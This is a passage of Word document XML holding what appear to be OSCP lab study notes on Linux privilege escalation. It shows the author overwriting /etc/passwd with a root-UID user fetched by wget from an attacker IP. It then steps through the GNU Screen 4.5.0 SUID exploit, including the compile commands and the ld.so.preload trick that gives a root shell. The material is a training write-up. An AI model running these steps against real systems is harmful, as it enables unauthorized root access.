        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="1440" w:right="600" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">user3:$1$user3$rAGRVf5p2jYTqtqOW5cPu/:0:0:/root/root:/bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000021A1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="515"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0"/>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4762500" cy="673100"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="136" name="image127.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image127.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId717"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="47625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21A2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="515"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Step #3: Use wget binary to download the new /etc/passwd file from my attacking machine and overwrite /etc/passwd file on target machine:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000021A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="515"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="1440" w:right="600" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">wget -O /etc/passwd</w:t>
      </w:r>
      <w:hyperlink r:id="rId718">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="ff0000"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId719">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="ff0000"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">http://192.168.49.112/passwd</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000021A4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="515"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0"/>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="1155cc"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4762500" cy="1358900"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="365" name="image375.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image375.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId720"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="47625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21A5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="515"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Step #4: Read the /etc/passwd file on the target machine to confirm the file was overwritten (I think they might have used the LFI exploit from earlier)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000021A6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="515"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0"/>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="635000"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="311" name="image308.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image308.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId72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1A7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="515"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Step #5: Switch to new user account to escalate Privileges to root:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000021A8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="515"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4000500" cy="3136900"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="569" name="image559.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image559.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId722"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="40005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21A9">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000021AA">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000021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AC">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000021AD">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000021AE">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_xm5cmte5w87k" w:id="298"/>
      <w:bookmarkEnd w:id="298"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SUID attacks not in GTFOBins or need more context</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000021AF">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000021B0">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This was from </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">OSCP-A .143</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> for priv esc</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000021B1">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So this was a terribly hard attack vector. And it was long, so I won't go into too much depth. I don't think this was even the intended priv esc. I think it was a kernel </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:strike w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">exploit</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. But, the way I and many others did it was with GNU Screen 4.5.0 exploit.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000021B2">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I saw screen when I looked at SUID bit binaries.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000021B3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5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/usr/bin/screen-4.5.0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000021B4">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And I could tell from discord that this was one way to Priv Esc</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000021B5">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So, I searched it up and found this from exploit DB</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000021B6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="598"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId723">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.exploit-db.com/exploits/41154</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000021B7">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I tried downloading it and running it, but it didn't work. So, I manually ran the commands</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000021B8">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And I did all the compiling locally</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000021B9">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First I ran /tmp/libhax.c, but then I got an error</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000021BA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="59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092200"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="321" name="image317.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image317.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId72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21BB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="598"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">I asked chatGPT and it said to add this line. You could have also searched up "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="fa0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">what C headers are needed for chmod</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">" and it would say  </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="fa0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;sys/stat.h&gt;</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000021BC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="598"/>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#include &lt;sys/stat.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000021BD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="598"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And it worked!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000021BE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="598"/>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gcc -fPIC -shared -ldl -o /tmp/libhax.so /tmp/libhax.c</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000021BF">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And then I tried creating </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="fa0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/tmp/rootshell.c</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> but I got another error, which I fixed via chatGPT by adding this line. You could have also searched up "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="fa0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">what C headers are needed for setuid</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">" and it would say</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="fa0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">  &lt;unistd.h&gt;</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> :</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000021C0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5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#include &lt;unistd.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000021C1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="598"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="fa0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="fa0000"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1955800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="218" name="image229.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image229.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId72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1C2">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And then it tells us to run "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="fa0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">gcc -o /tmp/rootshell /tmp/rootshell.c</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">" but we actually have different gcc version than the target (which we can tell from linPEAS appartently. Like ours is gcc and theres is gcc-9)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000021C3">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So, we actually can fix this by adding the "-static" flag</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000021C4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5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gcc -static -o /tmp/rootshell /tmp/rootshell.c</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000021C5">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And now we can move </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="fa0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">rootshell</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="fa0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> libhax.c</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="fa0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/tmp</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> in victim</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000021C6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="598"/>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chmod +x rootshell</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000021C7">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And then run this according to exploit (run these on the victim, not kali)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000021C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="598"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="fa0000"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="fa0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cd /etc</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000021C9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="598"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="fa0000"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="fa0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">umask 000</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000021CA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="598"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="fa0000"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="fa0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">screen -D -m -L ld.so.preload echo -ne  "\x0a/tmp/libhax.so"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000021CB">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This basically tells screen-4.5.0 to load our libhax.so so that it runs the malicious code to allow us to run shell as root!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000021CC">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And then go back to /tmp/rootshell, and run the rootshell</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000021CD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="598"/>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./rootshell</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000021CE">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and you should have root shell now!</w:t>
      </w:r>
    </w:p>
